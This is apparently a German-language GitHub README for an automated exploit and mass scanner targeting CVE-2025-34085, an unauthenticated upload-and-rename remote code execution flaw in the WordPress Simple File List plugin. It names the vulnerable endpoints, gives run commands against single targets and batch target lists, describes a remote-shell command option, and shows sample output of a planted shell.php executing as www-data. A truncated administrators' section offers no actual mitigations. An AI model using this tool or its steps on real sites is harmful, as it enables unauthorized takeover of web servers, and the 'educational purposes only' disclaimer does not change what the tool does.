
WordPress Simple File List Nicht authentifizierter RCE-Exploit
Ein automatisierter Exploit und Scanner für CVE-2025-34085, eine kritische Schwachstelle im WordPress Simple File List Plugin, die nicht authentifizierte Remote-Codeausführung durch willkürliches Hochladen und Umbenennen von Dateien ermöglicht.
Nicht authentifizierter Datei-Upload
/wp-content/plugins/simple-file-list/ee-upload-engine.phpUmbenennen in PHP-Erweiterung
.php- oder ähnliche Erweiterung um über:/wp-content/plugins/simple-file-list/ee-file-engine.phpPayload ausführen
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
Fügen Sie Ziel-URLs in targets.txt ein (eine pro Zeile), und führen Sie dann aus:
python3 CVE-2025-34085.py --cmd "whoami"
| Argument | Beschreibung |
|---|---|
-u | Ziel-URL (z. B. http://example.com) |
--cmd | Befehl, der auf der Remote-Shell ausgeführt werden soll (Standard: id) |
--inline | Inline-Payload verwenden (kein ?cmd=-Parameter) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Erfolgreiche Ziele werden in vuln.txt gespeichert.
CVE-2025-34085.py — Haupt-Exploit-Skripttargets.txt — (Optional) Liste der Zieldomänenvuln.txt — Protokoll erfolgreicher ExploitsAdministratoren sollten:
Dieses Projekt ist ausschließlich für Bildungs- und autorisierte Testzwecke bestimmt. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Dieses Projekt ist unter der MIT-Lizenz lizenziert. 📄 Vollständigen Lizenztext anzeigen
0xgh057r3c0n 🔗 GitHub: github.com/0xgh057r3c0n